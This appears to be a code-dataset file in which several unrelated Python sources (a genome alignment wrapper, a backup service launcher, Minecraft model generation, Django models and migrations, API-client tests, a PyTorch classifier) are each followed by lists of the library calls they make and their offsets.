print("REDIRECTING TO: ", output_file_path, "\n")
run(arguments, cwd=output_dir, stdout=output_file, check=True)
# ---- Index --------------
input_filename = output_filename
arguments = ["samtools", "index", input_filename]
print("\nRUNNING: ", " ".join(arguments))
run(arguments, cwd=output_dir, check=True)
output_sam_file_path = abspath(join(output_dir, output_filename_prefix + ".sorted.sam"))
output_bam_file_path = abspath(join(output_dir, output_filename_prefix + ".sorted.bam"))
return output_sam_file_path, output_bam_file_path
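
# Illustrative call (paths are hypothetical):
#   sam_path, bam_path = align_minimap("ref.fa", "reads.fastq", output_dir="out")
# runs, in order: minimap2 -a -x map-ont, samtools sort, samtools view -O BAM,
# and samtools index, then returns the sorted SAM and BAM paths. With
# sam_only=True it stops after minimap2 and returns only the raw SAM path.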
|
[
"subprocess.run",
"os.path.abspath",
"os.path.basename",
"os.path.join",
"multiprocessing.cpu_count"
] |
[((616, 642), 'os.path.abspath', 'abspath', (['ref_sequence_path'], {}), '(ref_sequence_path)\n', (623, 642), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((669, 697), 'os.path.abspath', 'abspath', (['reads_sequence_path'], {}), '(reads_sequence_path)\n', (676, 697), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((779, 806), 'os.path.basename', 'basename', (['ref_sequence_path'], {}), '(ref_sequence_path)\n', (787, 806), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((926, 955), 'os.path.basename', 'basename', (['reads_sequence_path'], {}), '(reads_sequence_path)\n', (934, 955), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((1233, 1266), 'os.path.join', 'join', (['output_dir', 'output_filename'], {}), '(output_dir, output_filename)\n', (1237, 1266), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((2184, 2226), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'check': '(True)'}), '(arguments, cwd=output_dir, check=True)\n', (2187, 2226), False, 'from subprocess import run, PIPE\n'), ((2381, 2414), 'os.path.join', 'join', (['output_dir', 'output_filename'], {}), '(output_dir, output_filename)\n', (2385, 2414), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((2908, 2950), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'check': '(True)'}), '(arguments, cwd=output_dir, check=True)\n', (2911, 2950), False, 'from subprocess import run, PIPE\n'), ((1557, 1619), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'stdout': 'output_file', 'check': '(True)'}), '(arguments, cwd=output_dir, stdout=output_file, check=True)\n', (1560, 1619), False, 'from subprocess import run, PIPE\n'), ((2668, 2730), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'stdout': 'output_file', 'check': '(True)'}), '(arguments, cwd=output_dir, stdout=output_file, check=True)\n', (2671, 2730), False, 'from subprocess import run, PIPE\n'), ((2987, 3043), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sorted.sam')"], {}), "(output_dir, output_filename_prefix + '.sorted.sam')\n", (2991, 3043), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((3080, 3136), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sorted.bam')"], {}), "(output_dir, output_filename_prefix + '.sorted.bam')\n", (3084, 3136), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((1805, 1854), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sam')"], {}), "(output_dir, output_filename_prefix + '.sam')\n", (1809, 1854), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((538, 549), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (547, 549), False, 'from multiprocessing import cpu_count\n')]
|
import os
import ptvsd
import platform
import asyncio
import logging
from aiorun import run
from injector import Injector
from .logger import getLogger, CONSOLE, HISTORY
from backup.config import Config, Setting
from backup.module import MainModule, BaseModule
from backup.starter import Starter
from time import sleep
from sys import argv
from os.path import join, abspath
logger = getLogger(__name__)
async def main(config):
await Injector([BaseModule(config), MainModule()]).get(Starter).startup()
while True:
await asyncio.sleep(1)
if __name__ == '__main__':
config = Config()
if len(argv) > 1:
# Needed to load a different config for dev environments.
config = Config.withFileOverrides(abspath(join(__file__, "../../dev/data", argv[1] + "_options.json")))
else:
config = Config.fromFile(Setting.CONFIG_FILE_PATH.default())
logger.overrideLevel(config.get(Setting.CONSOLE_LOG_LEVEL), config.get(Setting.LOG_LEVEL))
if config.get(Setting.DEBUGGER_PORT) is not None:
port = config.get(Setting.DEBUGGER_PORT)
logger.info("Starting debugger on port {}".format(port))
ptvsd.enable_attach(('0.0.0.0', port))
if platform.system() == "Windows":
# Needed for dev on windows machines
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main(config))
else:
run(main(config))
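
# Illustrative dev invocation (entry-point name assumed): running this module
# with a single argument, e.g. "staging", loads dev/data/staging_options.json
# in place of the default config path, per the argv handling above.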
|
[
"backup.config.Config",
"ptvsd.enable_attach",
"asyncio.sleep",
"backup.module.BaseModule",
"backup.module.MainModule",
"backup.config.Setting.CONFIG_FILE_PATH.default",
"platform.system",
"os.path.join",
"asyncio.WindowsSelectorEventLoopPolicy"
] |
[((600, 608), 'backup.config.Config', 'Config', ([], {}), '()\n', (606, 608), False, 'from backup.config import Config, Setting\n'), ((1165, 1203), 'ptvsd.enable_attach', 'ptvsd.enable_attach', (["('0.0.0.0', port)"], {}), "(('0.0.0.0', port))\n", (1184, 1203), False, 'import ptvsd\n'), ((1212, 1229), 'platform.system', 'platform.system', ([], {}), '()\n', (1227, 1229), False, 'import platform\n'), ((541, 557), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (554, 557), False, 'import asyncio\n'), ((853, 887), 'backup.config.Setting.CONFIG_FILE_PATH.default', 'Setting.CONFIG_FILE_PATH.default', ([], {}), '()\n', (885, 887), False, 'from backup.config import Config, Setting\n'), ((1327, 1367), 'asyncio.WindowsSelectorEventLoopPolicy', 'asyncio.WindowsSelectorEventLoopPolicy', ([], {}), '()\n', (1365, 1367), False, 'import asyncio\n'), ((748, 807), 'os.path.join', 'join', (['__file__', '"""../../dev/data"""', "(argv[1] + '_options.json')"], {}), "(__file__, '../../dev/data', argv[1] + '_options.json')\n", (752, 807), False, 'from os.path import join, abspath\n'), ((453, 471), 'backup.module.BaseModule', 'BaseModule', (['config'], {}), '(config)\n', (463, 471), False, 'from backup.module import MainModule, BaseModule\n'), ((473, 485), 'backup.module.MainModule', 'MainModule', ([], {}), '()\n', (483, 485), False, 'from backup.module import MainModule, BaseModule\n')]
|
from mcresources import ResourceManager
from mcresources import utils
def generate(rm: ResourceManager):
vanilla_woods = ('oak', 'acacia', 'dark_oak', 'birch', 'jungle', 'spruce')
for wood in vanilla_woods:
direct_block_model(rm, 'betterfoliage:%s_leaves' % wood, {
'loader': 'betterfoliage:leaves',
'leaves': 'minecraft:block/%s_leaves' % wood,
'fluff': 'betterfoliage:block/%s_fluff' % wood
})
rm.blockstate('minecraft:%s_leaves' % wood, model='betterfoliage:block/%s_leaves' % wood)
pad = 0
for flower in range(0, 1 + 1):
for root in range(0, 2 + 1):
rm.block_model('betterfoliage:lily_pad%d' % pad, parent='betterfoliage:block/lily_pad', textures={
'flower': 'betterfoliage:block/lilypad_flower%d' % flower,
'roots': 'betterfoliage:block/lilypad_roots%d' % root
})
pad += 1
cactus_variants = [{'model': 'minecraft:block/cactus', 'weight': 3, 'y': i} for i in (0, 90, 180, 270)]
cactus_variants.extend([{'model': 'betterfoliage:block/cactus1', 'weight': 2, 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus2', 'weight': 4, 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus3', 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus4', 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus5', 'y': i} for i in (0, 90, 180, 270)])
rm.blockstate('minecraft:cactus', variants={"": cactus_variants}, use_default_model=False)
rm.blockstate('minecraft:grass_block', variants={
'snowy=false': {'model': 'betterfoliage:block/grass_block'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
rm.blockstate('minecraft:mycelium', variants={
'snowy=false': {'model': 'betterfoliage:block/mycelium'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
rm.blockstate('minecraft:podzol', variants={
'snowy=false': {'model': 'betterfoliage:block/podzol'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
direct_block_model(rm, 'betterfoliage:grass_block', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/grass_block_top',
'overlay': 'minecraft:block/grass_block_side_overlay',
'tint': True
})
direct_block_model(rm, 'betterfoliage:snowy_grass_block', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/snow',
'overlay': 'minecraft:block/grass_block_snow',
'tint': False
})
direct_block_model(rm, 'betterfoliage:mycelium', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/mycelium_top',
'overlay': 'minecraft:block/mycelium_side',
'tint': False
})
direct_block_model(rm, 'betterfoliage:podzol', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/podzol_top',
'overlay': 'minecraft:block/podzol_side',
'tint': False
})
def direct_block_model(rm: ResourceManager, location: utils.ResourceIdentifier, json: utils.Json):
res = utils.resource_location(rm.domain, location)
rm.write((*rm.resource_dir, 'assets', res.domain, 'models', 'block', res.path), json)
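
# For illustration: direct_block_model(rm, 'betterfoliage:grass_block', {...})
# resolves the resource location and writes the JSON verbatim to
# <resource_dir>/assets/betterfoliage/models/block/grass_block.json, bypassing
# mcresources' model helpers so the custom 'loader' models above can be emitted.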
|
[
"mcresources.utils.resource_location"
] |
[((3477, 3521), 'mcresources.utils.resource_location', 'utils.resource_location', (['rm.domain', 'location'], {}), '(rm.domain, location)\n', (3500, 3521), False, 'from mcresources import utils\n')]
|
# Generated by Django 2.1.5 on 2019-03-06 18:20
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('recruitment', '0013_auto_20190306_1652'),
]
operations = [
migrations.CreateModel(
name='EvaluationQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField()),
('timestamp', models.DateTimeField(default=django.utils.timezone.localtime)),
('application_evaluation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='recruitment.ApplicationEvaluation')),
],
),
]
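# Applying this migration follows the standard Django workflow:
#   python manage.py migrate recruitment
# Note: because 'default' above is a callable (django.utils.timezone.localtime),
# Django invokes it at row-creation time instead of freezing a single timestamp.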
|
[
"django.db.models.DateTimeField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.AutoField"
] |
[((408, 501), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (424, 501), False, 'from django.db import migrations, models\n'), ((529, 547), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (545, 547), False, 'from django.db import migrations, models\n'), ((580, 641), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.localtime'}), '(default=django.utils.timezone.localtime)\n', (600, 641), False, 'from django.db import migrations, models\n'), ((687, 794), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""recruitment.ApplicationEvaluation"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'recruitment.ApplicationEvaluation')\n", (704, 794), False, 'from django.db import migrations, models\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2016 Open Permissions Platform Coalition
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
#
from mock import Mock
from tornado.httpclient import HTTPRequest
from chub.api import Resource
fetch = Mock()
world = Resource('world', fetch)
def setup_function(function):
fetch.reset_mock()
def test_root_resource():
assert world.path == 'world'
def test_one_level_sub_resource():
countries = world.countries
assert isinstance(countries, Resource)
assert countries.path == 'world/countries'
def test_methods():
country_getter = world.countries.get
assert not isinstance(country_getter, Resource)
continent = 'South America'
national_dance = 'Samba'
country_getter(continent=continent, national_dance=national_dance)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='GET',
request='world/countries',
continent=continent,
national_dance=national_dance)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
country_setter = world.countries.post
assert not isinstance(country_setter, Resource)
name = 'Utopia'
founder = '<NAME>'
country_setter(name=name, founder=founder)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='POST',
request='world/countries',
name=name,
founder=founder)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
def test_resource_item():
uk = world.countries['uk']
assert isinstance(uk, Resource)
assert uk.path == 'world/countries/uk'
def test_two_level_sub_resource():
uk_cities = world.countries['uk'].cities
assert isinstance(uk_cities, Resource)
assert uk_cities.path == 'world/countries/uk/cities'
london = uk_cities['london']
assert isinstance(london, Resource)
assert london.path == 'world/countries/uk/cities/london'
city_getter = uk_cities.get
assert not isinstance(city_getter, Resource)
location = 'north'
dialect = 'geordie'
city_getter(location=location, dialect=dialect)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='GET',
request='world/countries/uk/cities',
location=location,
dialect=dialect)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
def test_resource_with_hyphen():
world = Resource('world', fetch)
time_zones = world.countries.us['time-zones']
assert time_zones.path == 'world/countries/us/time-zones'
def test_resource_url_encode():
world = Resource('world', fetch)
bar = world['http://example.com/foo?name=bar']
assert bar.path == 'world/http%3A%2F%2Fexample.com%2Ffoo%3Fname%3Dbar'
def test_prepare_request():
world.secrets.prepare_request(auth_username='user',
auth_password='password')
world.secrets.get(subject='pyramid')
req = fetch.call_args[-1]['request']
assert isinstance(req, HTTPRequest)
assert req.auth_username == 'user'
assert req.auth_password == 'password'
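# Minimal sketch (not chub's actual implementation, just an illustration of the
# pattern these tests exercise): attribute and index access extend the path,
# HTTP-verb attributes terminate the chain, and item keys are URL-encoded.
# '_SketchResource' and its internals are hypothetical names.
from urllib.parse import quote

class _SketchResource:
    _VERBS = frozenset({'get', 'post', 'put', 'delete'})

    def __init__(self, path, fetch):
        self.path = path
        self._fetch = fetch

    def __getattr__(self, name):
        if name in self._VERBS:
            # Verbs return a callable that issues the request via the injected fetch
            return lambda **kwargs: self._fetch(method=name.upper(), request=self.path, **kwargs)
        return _SketchResource('%s/%s' % (self.path, name), self._fetch)

    def __getitem__(self, item):
        # quote(..., safe='') also encodes '/', matching test_resource_url_encode
        return _SketchResource('%s/%s' % (self.path, quote(item, safe='')), self._fetch)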
|
[
"chub.api.Resource",
"mock.Mock"
] |
[((718, 724), 'mock.Mock', 'Mock', ([], {}), '()\n', (722, 724), False, 'from mock import Mock\n'), ((733, 757), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (741, 757), False, 'from chub.api import Resource\n'), ((3118, 3142), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (3126, 3142), False, 'from chub.api import Resource\n'), ((3302, 3326), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (3310, 3326), False, 'from chub.api import Resource\n')]
|
# Imports here
import torch
from torch import nn
from torch import optim
from torchvision import datasets, transforms, models
import time
from collections import OrderedDict
import matplotlib.pyplot as plt
import torch.nn.functional as F
import numpy as np
# Build the network
class Network(nn.Module):
def __init__(self, input_size, hidden_sizes, output_size,
dropIn_p=0, dropHidden_p=0):
super().__init__()
        # hidden layer modules
self.hidden_layers = nn.ModuleList(
[nn.Linear(input_size, hidden_sizes[0])])
pair_hidden_sizes = zip(hidden_sizes[:-1], hidden_sizes[1:])
self.hidden_layers.extend([nn.Linear(h1, h2)
for h1, h2 in pair_hidden_sizes])
        # output layer
self.output = nn.Linear(hidden_sizes[-1], output_size)
# dropout layer for input
self.dropoutIn = nn.Dropout(p=dropIn_p)
# dropout layer for each hidden layer
self.dropoutHidden = nn.Dropout(p=dropHidden_p)
def forward(self, x):
# Apply the in-drop layer on input layer
x = self.dropoutIn(x)
        # Apply linear combinations, activations, and the hidden dropout layer
for hidden_layer in self.hidden_layers:
x = hidden_layer(x)
x = F.relu(x)
x = self.dropoutHidden(x)
# Apply the linear combination on the last hidden layer to get the logits (scores of output)
x = self.output(x)
        # Apply log-softmax to get log-probabilities (numerically more stable than softmax; pair with nn.NLLLoss)
x = F.log_softmax(x, dim=1)
return x
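# Quick shape check (illustrative, not from the original file):
#   net = Network(784, [256, 128], 10, dropIn_p=0.2, dropHidden_p=0.5)
#   net(torch.randn(4, 784)).shape  # -> torch.Size([4, 10]) of log-probabilities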
# Get classifier based on feature detectors (pre_trainned CNN model)
def get_classifier(pre_trained_model, hidden_sizes, output_size, dropIn_p=0, dropHidden_p=0):
# freeze the pre_trained parameters
for param in pre_trained_model.parameters():
param.requires_grad = False
input_size = pre_trained_model.classifier[0].state_dict()[
'weight'].shape[1]
print(f"input_size of features to the classifier: {input_size}")
print(f'hidden_sizes in classifier: {hidden_sizes}')
print(f"output_size of classes from the classifier: {output_size}")
print()
classifier = Network(input_size, hidden_sizes,
output_size, dropIn_p, dropHidden_p)
pre_trained_model.classifier = classifier
return pre_trained_model
# Build validation function
def validation(model, criterion, valid_loader, gpu):
valid_loss = 0
valid_accuracy = 0
device = torch.device(
'cuda:0' if torch.cuda.is_available() and gpu else 'cpu')
print(f'validation using device:{device}')
model.to(device)
model.eval()
# Iterate over batches
for images, labels in valid_loader:
images, labels = images.to(device), labels.to(device)
# forward pass
with torch.no_grad():
outputs = model.forward(images)
# calculate loss
loss = criterion(outputs, labels)
valid_loss += loss.item()
ps = torch.exp(outputs)
equality = (labels == ps.max(dim=1)[1])
valid_accuracy += equality.type(torch.float64).mean().item()
info = {'loss': valid_loss / len(valid_loader),
'accuracy': valid_accuracy / len(valid_loader)}
return info
# define Train the model function
def train(model, optimizer, criterion, trainloader, validloader, gpu, epochs=2, print_every=40):
device = torch.device(
'cuda:0' if torch.cuda.is_available() and gpu else 'cpu')
print(f'train using device:{device}')
model.to(device)
model.train()
    running_loss = 0
    steps = 0
    # Guard against a NameError in 'measurements' below when fewer than
    # 'print_every' steps run (no validation pass would have happened yet)
    train_loss = float('nan')
    valid = {'loss': float('nan'), 'accuracy': float('nan')}
start = time.time()
print('Training started...')
for e in range(epochs):
for images, labels in trainloader:
images, labels = images.to(device), labels.to(device)
            # Clear the gradients of all optimized parameters
optimizer.zero_grad()
# Forward pass
outputs = model.forward(images)
# Calculate loss error for training
loss = criterion(outputs, labels)
running_loss += loss.item()
steps += 1
            # Backpropagate: compute gradients of the loss w.r.t. the parameters
loss.backward()
# Performs a single optimization step.
optimizer.step()
if steps % print_every == 0:
model.eval()
valid = validation(model, criterion, validloader, gpu)
train_loss = running_loss / print_every
print(f'epoch {e+1}/{epochs}')
                print(f'training loss = {train_loss :0.4}')
print(f'valid loss = {valid["loss"] :0.4} ...',
f'valid accuracy = {valid["accuracy"] :0.4}')
print('.............................')
running_loss = 0
model.train()
time_elapsed = time.time() - start
print("\nTotal time: {:.0f}m {:.0f}s".format(
time_elapsed//60, time_elapsed % 60))
print('Training Finished...')
measurements = {'train_loss': train_loss,
'valid_loss': valid["loss"], 'valid_accuracy': valid["accuracy"]}
return measurements
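# Hedged usage sketch (not in the original file): wiring the pieces together.
# The vgg16 backbone, hyperparameters and data paths are illustrative; any
# torchvision model whose '.classifier' starts with an nn.Linear fits get_classifier.
def main():
    tfm = transforms.Compose([transforms.Resize(255),
                            transforms.CenterCrop(224),
                            transforms.ToTensor(),
                            transforms.Normalize([0.485, 0.456, 0.406],
                                                 [0.229, 0.224, 0.225])])
    trainloader = torch.utils.data.DataLoader(
        datasets.ImageFolder('data/train', transform=tfm), batch_size=64, shuffle=True)
    validloader = torch.utils.data.DataLoader(
        datasets.ImageFolder('data/valid', transform=tfm), batch_size=64)
    model = get_classifier(models.vgg16(pretrained=True),
                           hidden_sizes=[512, 256], output_size=102,
                           dropIn_p=0.2, dropHidden_p=0.5)
    criterion = nn.NLLLoss()  # pairs with the log_softmax output of Network
    optimizer = optim.Adam(model.classifier.parameters(), lr=0.001)
    train(model, optimizer, criterion, trainloader, validloader, gpu=True)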
|
[
"torch.nn.Dropout",
"time.time",
"torch.exp",
"torch.cuda.is_available",
"torch.nn.functional.log_softmax",
"torch.nn.Linear",
"torch.nn.functional.relu",
"torch.no_grad"
] |
[((3674, 3685), 'time.time', 'time.time', ([], {}), '()\n', (3683, 3685), False, 'import time\n'), ((813, 853), 'torch.nn.Linear', 'nn.Linear', (['hidden_sizes[-1]', 'output_size'], {}), '(hidden_sizes[-1], output_size)\n', (822, 853), False, 'from torch import nn\n'), ((913, 935), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropIn_p'}), '(p=dropIn_p)\n', (923, 935), False, 'from torch import nn\n'), ((1011, 1037), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropHidden_p'}), '(p=dropHidden_p)\n', (1021, 1037), False, 'from torch import nn\n'), ((1593, 1616), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['x'], {'dim': '(1)'}), '(x, dim=1)\n', (1606, 1616), True, 'import torch.nn.functional as F\n'), ((3055, 3073), 'torch.exp', 'torch.exp', (['outputs'], {}), '(outputs)\n', (3064, 3073), False, 'import torch\n'), ((4907, 4918), 'time.time', 'time.time', ([], {}), '()\n', (4916, 4918), False, 'import time\n'), ((1323, 1332), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (1329, 1332), True, 'import torch.nn.functional as F\n'), ((2880, 2895), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2893, 2895), False, 'import torch\n'), ((529, 567), 'torch.nn.Linear', 'nn.Linear', (['input_size', 'hidden_sizes[0]'], {}), '(input_size, hidden_sizes[0])\n', (538, 567), False, 'from torch import nn\n'), ((674, 691), 'torch.nn.Linear', 'nn.Linear', (['h1', 'h2'], {}), '(h1, h2)\n', (683, 691), False, 'from torch import nn\n'), ((2584, 2609), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2607, 2609), False, 'import torch\n'), ((3500, 3525), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3523, 3525), False, 'import torch\n')]
|
from django.db import models
from django.conf import settings
class Contact(models.Model):
user1 = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='user1')
user2 = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='user2')
@staticmethod
def get_contact(user1: settings.AUTH_USER_MODEL, user2: settings.AUTH_USER_MODEL):
try:
contact = Contact.objects.get(user1=user1, user2=user2)
except Contact.DoesNotExist:
try:
contact = Contact.objects.get(user1=user2, user2=user1)
except Contact.DoesNotExist:
return None
return contact
@staticmethod
def get_friends(user: settings.AUTH_USER_MODEL):
friends = []
for contact in Contact.objects.all():
if contact.user1 == user:
friends.append(contact.user2)
elif contact.user2 == user:
friends.append(contact.user1)
        friends = sorted(friends, key=lambda friend: friend.last_name)  # avoid shadowing the 'user' parameter
return friends
@staticmethod
def create_contact(user1: settings.AUTH_USER_MODEL, user2: settings.AUTH_USER_MODEL):
contact = Contact(user1=user1, user2=user2)
contact.save()
@staticmethod
def delete_contact(owner: settings.AUTH_USER_MODEL, del_friend: settings.AUTH_USER_MODEL):
Contact.objects.filter(user1=owner, user2=del_friend).delete()
Contact.objects.filter(user1=del_friend, user2=owner).delete()
class ContactRequest(models.Model):
sender = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='sender')
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='receiver')
is_active = models.BooleanField(blank=True, null=False, default=True)
def accept(self):
Contact.create_contact(self.sender, self.receiver)
self.is_active = False
self.save()
def decline(self):
self.is_active = False
self.save()
@staticmethod
def get_request(sender: settings.AUTH_USER_MODEL, receiver: settings.AUTH_USER_MODEL):
try:
contact_request = ContactRequest.objects.get(sender=sender, receiver=receiver, is_active=True)
except ContactRequest.DoesNotExist:
return None
return contact_request
@staticmethod
def create_request(sender: settings.AUTH_USER_MODEL, receiver: settings.AUTH_USER_MODEL):
try:
contact_request = ContactRequest(sender=sender, receiver=receiver)
contact_request.save()
        except Exception:  # the bound exception was unused
return None
return contact_request
@staticmethod
def get_senders(user: settings.AUTH_USER_MODEL):
"""
Возвращает список поль-лей которые отправили запрос для user
:param user:
:return:
"""
return [request.sender for request in ContactRequest.objects.filter(receiver=user, is_active=True)]
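# Hedged usage sketch (not part of the original file): the friend-request flow
# these models implement; 'sender' and 'receiver' are assumed saved user rows.
def send_and_accept(sender, receiver):
    request = ContactRequest.create_request(sender=sender, receiver=receiver)
    if request is not None:
        request.accept()  # creates the Contact row and deactivates the request
    return Contact.get_friends(receiver)  # now includes 'sender'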
|
[
"django.db.models.ForeignKey",
"django.db.models.BooleanField"
] |
[((105, 200), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""user1"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='user1')\n", (122, 200), False, 'from django.db import models\n'), ((209, 304), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""user2"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='user2')\n", (226, 304), False, 'from django.db import models\n'), ((1598, 1694), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""sender"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='sender')\n", (1615, 1694), False, 'from django.db import models\n'), ((1706, 1804), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""receiver"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='receiver')\n", (1723, 1804), False, 'from django.db import models\n'), ((1818, 1875), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'blank': '(True)', 'null': '(False)', 'default': '(True)'}), '(blank=True, null=False, default=True)\n', (1837, 1875), False, 'from django.db import models\n')]
|